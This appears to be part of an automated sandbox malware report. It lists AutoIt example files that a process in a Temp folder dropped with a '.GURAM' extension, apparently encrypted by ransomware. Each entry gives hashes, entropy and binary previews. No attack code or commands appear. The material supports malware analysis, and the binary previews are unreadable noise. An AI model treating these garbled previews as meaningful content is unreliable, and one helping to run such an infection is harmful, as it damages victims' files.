                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1513
                                                                                                                                                                                                                                                Entropy (8bit):7.866278495076296
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:oatU8ANjaGcYlfYVg3p+R5PjHRT5+gKvZzCx0ejmJrc0YXUZtwsTsp:pANjNbn5ojRT5+gKV64o0jZtwxp
                                                                                                                                                                                                                                                MD5:17822D079071BE64BA061BF80216B9EE
                                                                                                                                                                                                                                                SHA1:B9AAB0EF4CF9B648666672BAA7AD6E20110C7CE8
                                                                                                                                                                                                                                                SHA-256:3F2A721511F685B61BF72AB108F59E64676F6B7CB334CAFD5D777D2ED81421E6
                                                                                                                                                                                                                                                SHA-512:8B0574C15FC01C15E8354744C2E26D8EFD6EF6D27F53D0D115040E72A62021FDFA454FE38C965CB7FBCC1129A2D60BD1D28B73E3764D68D76CE5FF2DC034F3C7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:H/.z..TOj#.V....J.&...._..)z.;.~...[..uE..o.*..."..&Z...............t.$..I=..Y...1wu.X.......n.pu.F..5.0u....,.EXW..?...b.S/....x.?.;.../..W..!.,:..).e....^....j.R......t+.1"..GQ..Mq..g#.1..D.g... ."~.xe.1.....FN.&...#.2...A.C+...B..>....S.=....@SQ.....5..|....!.*..;......<.......m..1.......2.."4..?^........m.......-...Y#..+..Ni+....)b.&..y..0..)JE(n.2(...#......8..I_.. ..z[..au?.........*."......p....t........Z.27>..W..-[..v.j....+Ku....b.:6w..i~}.s.{...v..2..B3[1..M.&U.+........ .w....G...u......o.......z....*...<..Y."R..*.....].&.1;.m..}P9.......6.I.8..P.....y.iK.IJ?.z.....-..rOy..y.G.X...o.1.AR..06.. .....K...f..".id{../....3q....T.8....nJ-.....|.....Q..T...fA.jv.H9\.~...Z....WI..Y.}....z.......b.. .Lh.%e..............L..Rp!ch...]...d{......s..3I9..byR....u....*iK./j5.l......._.1.....T...p.'.WW.Cg....H..q+.c`;F,....L....35.$0{@O...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Beep.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Public Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):689
                                                                                                                                                                                                                                                Entropy (8bit):7.673044881198353
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:M49mcEZWyjaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZnhBQMku:MOmNZWyjmJrc0YXUZtwsTzhBQk
                                                                                                                                                                                                                                                MD5:8A9F6E754C6EB4695AD51F11C39E5627
                                                                                                                                                                                                                                                SHA1:E828422932435D333667EB7AEA36674CECA664F2
                                                                                                                                                                                                                                                SHA-256:985B229E9FCCCC0C157CA68F4DCA1F20959FA3963BD08011EFA50D83C3AF1A11
                                                                                                                                                                                                                                                SHA-512:C15E3916281338379857EBEB4C82F1290A6AFC13F991510CEB9538EBE806F525E64471122E3FCBEDB3A9F95150FC99A7B16B18B383042DE33A790A989CD96B89
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.U#....6..u..4..K.g..e..&..:?G.x1.%.....V.r%YeC....jB.U3h..<...P..Sb=..D:...l...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.63!....#x..I..y....(...c...Z.yP.Q...................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\Binary.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):806
                                                                                                                                                                                                                                                Entropy (8bit):7.691633950295935
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:6sR3NEArKYO4ck8mmSKC2jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1W:NdGYO4vm5HjmJrc0YXUZtwsT/03r
                                                                                                                                                                                                                                                MD5:3964E3956478C3414BC9FCB1CBDB4830
                                                                                                                                                                                                                                                SHA1:3DD1448F7FA6951E3B8CBBAAF18690C33C7AD075
                                                                                                                                                                                                                                                SHA-256:E1CBFE6DC94F480401CA740B5402984B782420E8D975D5B9FD277C8F214BE28D
                                                                                                                                                                                                                                                SHA-512:D9DAD141B1392DB8199187978978294FCC5F9F0EC408104A07DFAAEDFCAA9A06E3630DDFF86DC1A505FCE6B4CE12D123445AAD17B447175861AE93B08E377482
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:e-.}..y..MW.{..9)E.........2.K$..YMDcka.R....Y:.j^Y...u..*....Y.q.F..Q_s.b).....\.......'+..*.._.e...&D..8...]..!..g...d...Y."..'s..j....S....5vCv......^....&..oJ.{.UCA.d.A8.w+.......b.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.J...R......cT.P...;s.8.c...z.'vP.......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\BinaryLen.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):801
                                                                                                                                                                                                                                                Entropy (8bit):7.7308335386192795
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:1OqGIEL+PCWqBXENCbkwe2jaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsOK:1fa+PCWqBUNCbde2jmJrc0YXUZtwsTg
                                                                                                                                                                                                                                                MD5:6C6745A824EA3BCD561D59CB63932C29
                                                                                                                                                                                                                                                SHA1:3CFA69874331B071EDD678D5F01025B7EB501386
                                                                                                                                                                                                                                                SHA-256:06ACCC446110AB9645F0A073880F32D4E673F89A410A4D5B37330BFCFEF37811
                                                                                                                                                                                                                                                SHA-512:0897E53A9C6032C52A17C61D39E02FE7590A1A2E60711E9BE8200E0026FE537B1774E4E48B9368EBFD7C1E509BA8927B4ED2B58D9C196300F028490FBDF75F2F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..C..c.......7]....^b,...aU...!0......0.R}..l.$....E.g.V....%O..O.KN.lY).a. .<.G........WO.x/?R..c4=.... Wu..Q..;%..RB..W.@.i..T.O..../.b.(pv-2.~..3!.2R.)Kxn..y.Y...d.#..rQ.o........!.9d.>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.[A.e..?.pzu/..=%.S..F..W..{.}f...#Y....................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\BinaryMid.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):834
                                                                                                                                                                                                                                                Entropy (8bit):7.727080218981816
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:XrW1GS3kxX0TSnUljaGJYIsS+WwgHIc0jmksXU4HrkW6tDJum1qDkXvsO1xXZTku:lV+OUljmJrc0YXUZtwsTf
                                                                                                                                                                                                                                                MD5:01FA2F1EE6FF12623C628C1FE90AC82E
                                                                                                                                                                                                                                                SHA1:E1DE2E52C3D0E7303058B11ACC932AEAAF137AFB
                                                                                                                                                                                                                                                SHA-256:AD55A837D98B7A6248485BE2DB8A8AE46C5E07A1EF16514F799283223C5979FF
                                                                                                                                                                                                                                                SHA-512:0E9340E08CBA9507B059676DE22081BDBA3B64E920E7ACCA56AC6F083598096B32A1C8B86560D86AA7317971D2F022BF3357FFA8DE3CBE0E7605FDA20BF63C07
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..S.y....p.3NZ..z...N.A.v.R.. M!...7D..'s.T68N../F.:C..*....S.<dN...;~..]..,.G....]..fO.#.fIY....@.b..5\.z.P4.3./...(...6.+:.v.DD.e8>.Z.$"ij=....e.:......v...@z.?....:Gy. .6.n.....k....-.9J.k....j\..0Q.t.x3!...z.....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$.No...!..\.*..ga|..R..LV..k.$k>R.Q.......................fk.W...f

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\BinaryToString.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3361
                                                                                                                                                                                                                                                Entropy (8bit):7.944700139126812
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:IOZaES6Gp3eCd9y8/7C5ajJIP9wOI2Az9CWMHHH6ZfBF4o0jZtw5:H66GppyugaGlpApCWcHCfBule5
                                                                                                                                                                                                                                                MD5:62458B74F4577C6724887B00904EA85F
                                                                                                                                                                                                                                                SHA1:5391120D54DDEB1025D1A306E43C639EEBD05B0E
                                                                                                                                                                                                                                                SHA-256:AADE547E4E56F8927E82DA2B173C1DFDDFA966500429C4C069516DB3CFE0ABCB
                                                                                                                                                                                                                                                SHA-512:6C459E2DB823B0DEE09668C2C2C1DDD391E57FE1DF082CD5D52652D76745045CD3100CD43B702C8DDBF1D34D56B30C5AE28D68C97C157836DE86260E4700AE55
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.7..T..*.c.[....k....<./Q.t.MB....3.......MQ...^.....]..2..Q.(..z{T....qzt.".].8....h.a.8NS......#J.........h...=.....:>.Ot....I.h.e=..F.....R...(E.......x}c..h.Qp)...%.;U..;......<.._h.....C...h..X..YN.h.Q...{L...iI...o.Z8..G.).+..F.`.L.+l...!..X..n...c.>...R...W.X.Q......l....r......&..V."..S.Oe..'j. ..T(.X.....]../...%...P..l=Y:.W...X.M...../...6@..#.@.R 0.jK..^VD.8.~H...`...R..} ..sh..=.....r#}....h.-..-..j..!H...Y`_...J.0..J.g".AK..eY:..i.....DD....;..b7T.6...M.V.xro..}.....J).N.a....w.......v..Z9.A\P..e].E[|..}.&....pa...6....>u,...Tr........n......hp...(&.Qu..C.k...Y......O......T..PQ5i....fFR.. .n^.' .1\....k.0.+.*hPxa._.+..q.z...9p.....gx.<J...y|...W...5B.M....yR.....;sp.]..by.N.z.W..*...H.d......T(J.a/M.vn.qh..8..OVY.I.. s&^.....E8...).....[.]..R..$..R't.......d.......[.?..l....A*.H3v.4.y.2. T..;.......4*.U*.e.D.M.[.HQ...Trd.t.%Y.]~_....l....6.3...#Xq'..+!.!~...........JW.?.p}..W..m.$"...)gX.f.!-..b. 8...e.P...........

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\BitAND.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1514
                                                                                                                                                                                                                                                Entropy (8bit):7.868248858978245
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JD5mjCQfhLqpfiFiSHGhvsKY2+2pCxvy0JKjmJrc0YXUZtwsTslC:B53QZmqiSHG+Z2lpKyj4o0jZtwpC
                                                                                                                                                                                                                                                MD5:007B5E9F355D05A7AD15DFB1999EA2B0
                                                                                                                                                                                                                                                SHA1:EBB37B5A650671F2A6C869595D73E18709121FE6
                                                                                                                                                                                                                                                SHA-256:7696723D4A92A877365EAA1F606B953B66CA605AAB5537F3A95D0488AC8B5AD9
                                                                                                                                                                                                                                                SHA-512:53D988A97D7B94C9402EC6A762D36724F25BDC70F005BE6DAA2C886812835085B380BEDF279EC9460755536179C93FC1260761E82E3F7C09D4A6105E317D6ED1
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:3..[.pI........#c/..$.....8....?..&.q.....bX.4V...T.#..<....f.....w.70......)J...I...W..1..p..X..".X {ds?..}.H....B%#Q.wI%[k...:..._...g.8..=BB[._7..Q...&.+..!..g..W.3..3...6..n.=..V.....P.-.aa.9..]....=.=..A.....sV...&k.a:.^...q.K~.....l..$@=.>....^>.];...a....piJ........d.a.....H.DOAm._>......=.&Y.l8d&l<y....::...D..x(....>.C.e/.oLbh.$z..`.uC#.J.t........C.0.Te.L..+...84.U...ZH...J.".7...d.(*$V.....G.v....^.(.,..lH.I{..d.....|..pf.].%>...q.....G.\..N...z...]a8V)OJ.v.a...?Y2...V..bOi..d...].......H....|K..._.."..)..:\ m...L'.9N...A.8.^...+y.3tE...ci....]...b.|.R)!ImA...IX...o.*x..d?.Q....^"...u....O{.&...q.''....[^.]...<..v..].oWn.{-..B.N6K... .F.:.I.g8}..iS..1z..&{.U.7...."...........J;. ...9.U.._r._.w..5...R...(K.1.....\.!.X\P..C...^...v.e..|g.....%..c$....L..d..cT.RAT....q9...'.....'..Z.<..m....&.. v.k....."s.....[.=...B.&T.W.......v..6.9...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\BitNOT.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1025
                                                                                                                                                                                                                                                Entropy (8bit):7.765122521683573
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:YSROzAEUpzCFOz+oW2ijmJrc0YXUZtwsT2X:YqCspzKcNW94o0jZtwdX
                                                                                                                                                                                                                                                MD5:7487A090139253BDA0725F0295E0D36B
                                                                                                                                                                                                                                                SHA1:D1877DB9EB4C7823ADB4468B7AFBE9463AA1C427
                                                                                                                                                                                                                                                SHA-256:3455EFF937FDA55685C6515D8F3297D6DF9E512D62DE4ADBA6C9FDAF1C6598EB
                                                                                                                                                                                                                                                SHA-512:A81753042FB534C3664845E5B0B29DF6F64A9C1F1278C0F371CEC227E14F07570F016F60A298536AC7D809F4B43E90018430B3B33BEF6708EB77A34D8057A259
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:}..).Jg../......\..:t....FJ..hAMQO.W...q....Bf>.."...{..d..|+6k.......+.j...H....Z8...t......i.n.....zS7.=./u...J.P./........u..B.2.,t&....}!..,.tt9.h^6......=....=\-:M."ps....j.....j.*.NV&.D.(D.3z.YB-u.z...E.G.w^..>.f.5.6.a%/....9J..[...Q....u....P.....-.zL...u...PL-...;.V._....WTm..0....s...o).*......x..o.^U\|m..i..P..8.z....Ai."<...v.J).E.v.%?..9. =..'.v....S.Z#..........$_.m..m"..;....?^<..Nz....>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}.....|.y..l...kkd....,.8.....Y.5..%.|.,.G....E.)....t..v^V.t.s<m.s..i....=T..1.?wd#.).....LN.....}.O..F. ..ov.....7...y....^..=..Pk?..P.Q..y .U....=H[.ZsT..N........y........./yZ.A.]+....X....n...........vN.e!f....N....k.Qu.J%...u..)46c...6...l.}).A....4....3.'.....;..s^...F..O..h+,..\..F.....:[.>..Q.%k..U.|..............t...<.Mku.uW..g..m,Xw.}...N........5a.|....U.;D..._.....Z..C...._g...W.o....Fn$#jU.9..EL~..@&........... S....6.K.F-aY.I.wp6..2-$..lrp.{...p..X..R.~...h.~r|....9...?...

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\BitOR.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1545
                                                                                                                                                                                                                                                Entropy (8bit):7.852825360017206
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:rlt8/BcPo899R5NoBZSgsIIJXK+nHgNmmJ2aFPR7EwkjmJrc0YXUZtwsTfu:RtWWxJ8ZSJNn824PR7zq4o0jZtwMu
                                                                                                                                                                                                                                                MD5:2C7DF24CB3E1576B7750A87E789FD6EF
                                                                                                                                                                                                                                                SHA1:A0F0F0E6FADC3ADDD609CB9E2D7CDD85F2D47DAE
                                                                                                                                                                                                                                                SHA-256:F73C3294D3E3835F81CD547F34B1BAA663DE9CAB6CD9A02AAAA4E73D6CB51679
                                                                                                                                                                                                                                                SHA-512:754FA97568CEF2F5C88687443B392E3A884F58F14227DB3F1EF06ECC19D2EE2EEAD0EFB941819A3E15F1783FAE9429CC3A8DC4094456D290560F7B471DD4662B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..9Zpw..Dd.2....Be.a...H.f.u..iE>....K[NL.C....9.G5....b.........f".p...h..NKz.9pC:G.........n.L..T..A..;.......`._.R..p.:....M.......j.Z.2Nr.z.8.>..D.. ..(..!T.7QOe.(..(.g....=.X.z,...)...tOV...\$&..1d\r.gU..O.E....~5...7.^:..v..-............M.^..Y.^*.7...l.\..Bp..dCx....$P...{.t-.9..t..-QK........?.B..0..8<A..\.3P...M.S..y..L.-.`.E..u..Iz.S...<..s.jy..r.6h..[p.JVY+(........I.RNfv.kk".(m3.$.?.r.J).)W.....q1.%....|C..izg..O..b.3m|T.PU.(..J.-q.Ngq.^E..wC9.7H....C.c..{T.Kw.?.zg..H&.#c./....V..xY..\........sE./0h.Q.y'...$.w.v|.......p.AW.LQ.`....D...Z\..2.U..v.jE.B......}.1r.....q..\..7^......F.<...ZD.z..^U.'..S..?.z%..t...ylPl.....G...0..1.N.%CA.W".U.qH.|....t.?......Q....AP{.W...B....X.,=.......f.!.W.@.b.IG..@..U.^c..........~..?.>.<L.T.....<6....,Y.(.Ic-.?y.mN.......>5.+...A2.n.q..........-(.o.x....}...7...(Y...cg...ZMG.......I..k..K.dQ...).yd..H.<-.v.M.`.\.h....rU.2%..dP....I...>....=..=GsL.}<..\...{..g.v.Tq.cs..~..B.A.%.^..f<qp...;..P}

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\BitRotate.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1851
                                                                                                                                                                                                                                                Entropy (8bit):7.879530718372489
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:RE9ApMrfE+HCAVw1sYsgPFrEwPSVQgh4haRPFv//5eLui7jnRePHY5DjmJrc0YXC:RE9LF1GPWyM7norwPHY5H4o0jZtws
                                                                                                                                                                                                                                                MD5:0C0E5662384EDC6BF617AA9CC10BBD93
                                                                                                                                                                                                                                                SHA1:6899818F6A13067943EEF56A1104E15FDB1070E2
                                                                                                                                                                                                                                                SHA-256:31F8866FAE6CEF37BD8BD2432F5FB8771CEE78EA0579EB28C5813921173BE9D6
                                                                                                                                                                                                                                                SHA-512:EFE4410B7EC557C8DC1046B286F657CB2925C1D53F77A1499695B3F5CDAB105407D89852D9FADB1EFA07AFE58A0AC3C79091BD8EF3C41E2C08B1774982AEB6C0
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:/N8..a.#,T...%.....f&..&#?r.....*\].Q..b{.T......."..>.:...."c/;..s&d{......}.Oj.d.Y.....q+j....}.r..e.....vy6.g^.u..%.<.&i.>....x/..B.G.X.k..z...........#d...??...@.~..rN{...>{.)........".".D.5..sF...c.I.+1*.)v-....C..8....Ny@;.0.J.....].?.*.....Ef&..D.x..7#.?..!...r.K.i.......).U.......c.e..W...._U8...O...<...E..P.y7LkVQy.`.....b._....C.......tO.kr*.*.........,.........aO...D.T.+...Z..o$.....V..9n..O......l......NP3...#....%.j6....g&...'?.......KI...1.......V..Q.!:.;.<.7...?\M..$9........Y.../.T?.;..Xi].._.X.4..H..1....|......f.<.1.?'.2SA.......5.l.T!.o.9...........$.#G....s...g.......+....PG#1..&zL....|D.?......S..w.@#V..2...b?.Z..[..Z.....b.^....I.;..Q...(. h.&N.g..w...h........s.F.*...y...I.x....'..qy...[..N.x...R...%.|9.L..a.[..S.h.T.....c}0..R...w......7y.^.EV.$..B.Swio+....x$7.M.5EUC............+.......x..........#....L.%.a.L..jd.`... ....?..2.g./...7..c..aPT.7KD....z.(.z...j|>.5.wVy.k .\............R%O...#..9.%..)v

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\BitShift.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1801
                                                                                                                                                                                                                                                Entropy (8bit):7.88835974455501
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:F6NRuYvX6Torr2M+krrH7WFhtjSH14zzrbf3MGsNJmx+zLHIJMwrlSa0jmJrc0YJ:Fb4Xf3OkfKx7rPW7IMLV4o0jZtwf
                                                                                                                                                                                                                                                MD5:5335A154550E7490E4AA5CEB3C0AF5E1
                                                                                                                                                                                                                                                SHA1:777BE34A9137C570D60B0760A4B86F7332467EF9
                                                                                                                                                                                                                                                SHA-256:8C1079EF621D843AC07698F15F170A04FA5F0D305744BE9DAF9F1A7BADEB706F
                                                                                                                                                                                                                                                SHA-512:6830D7F8BDFE7EE0C6C46E7A22992D66A61C441C9D2D716E149987FD8505C908679468C68C407901D4F1E3045B4EB8D181773D6BC40CB86FF925F931F57A02FA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:c%......Q...,n..#.....F.=..3l..O`..ij.*.z.Hb...(!.Z)..,A,rso....^.."..,..i..-K@..`.......2-.).......].iK...o b...J%.<..u.*......$q=".........%....GS..|*r.{..p.cv.Tz.R=..).0...U....4.$..M..CNbT&.....*..\.....R..N..r..)D......rE..k...`..K.......L..,."..WS.2%....a+~41..L|.....k.......,_...W9..m.RG...;]..LD.K....l[.A..F..5.umV<.>@....;yIB.q...!..OB...e..v~^KG...l....%.u._..5@T........6.\...I..&...5,.%.s....a..x...'Q..h....O;.....L@.U.../..dk."xk%.~.=.K..+.O.}. ..sv..,..K.C.J..mc{.&d......xj....3d....5...u5......e{......P..-...3.:. jj/.X4T...2.&Aj...".....C._)..j......r[..... 9z.....D...-.z6..:......v.G.W..d.i.H.{-.W`N..~..K..xn..o..3....!.....^ 0..f....,..`....^F0...5...^..... xH.Yryh* ...E7H..2..eQf(....u3.@..fej....3B..~.baz.c=#........g.......(*R(Kk..C.../=.8..vh.!...=..P.B..%p...PG8.&i....u..Z.ga..4......]!...8R*4S./;...R,K...[.g..y......x$+:U<e[..j..w.A`d...X.L"&.9..(.'@-.?..~.Q. f:.........n.\..\?..+..\..T.G97.1 .....~%5..A,g.....

                                                                                                                                                                                                                                                C:\Program Files (x86)\autoit3\Examples\Helpfile\BitXOR.au3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1566
                                                                                                                                                                                                                                                Entropy (8bit):7.860564687425598
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:bUx2wa43JzFotkh16qtpfPbs4o0jZtwQcp:IxfzFo8162leHp
                                                                                                                                                                                                                                                MD5:4A06DDCF266C9353E0B42FB462B18D4D
                                                                                                                                                                                                                                                SHA1:91F302F008A895AB6F33BE162A38F7615D476CF4
                                                                                                                                                                                                                                                SHA-256:752638F9CA0C81BE32904F985ABE693EB070AD583CF4F622EC034B9C4E9D44EC
                                                                                                                                                                                                                                                SHA-512:FAF6F1A19349670D03B99549B7A7A7134DC1CEB6652DFE4D76F0B28029617D4F5C00B7737EC6734779AEB0CB3DDAFF20CF81D45945DFAEF90AC463E7BB6E7ACB
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
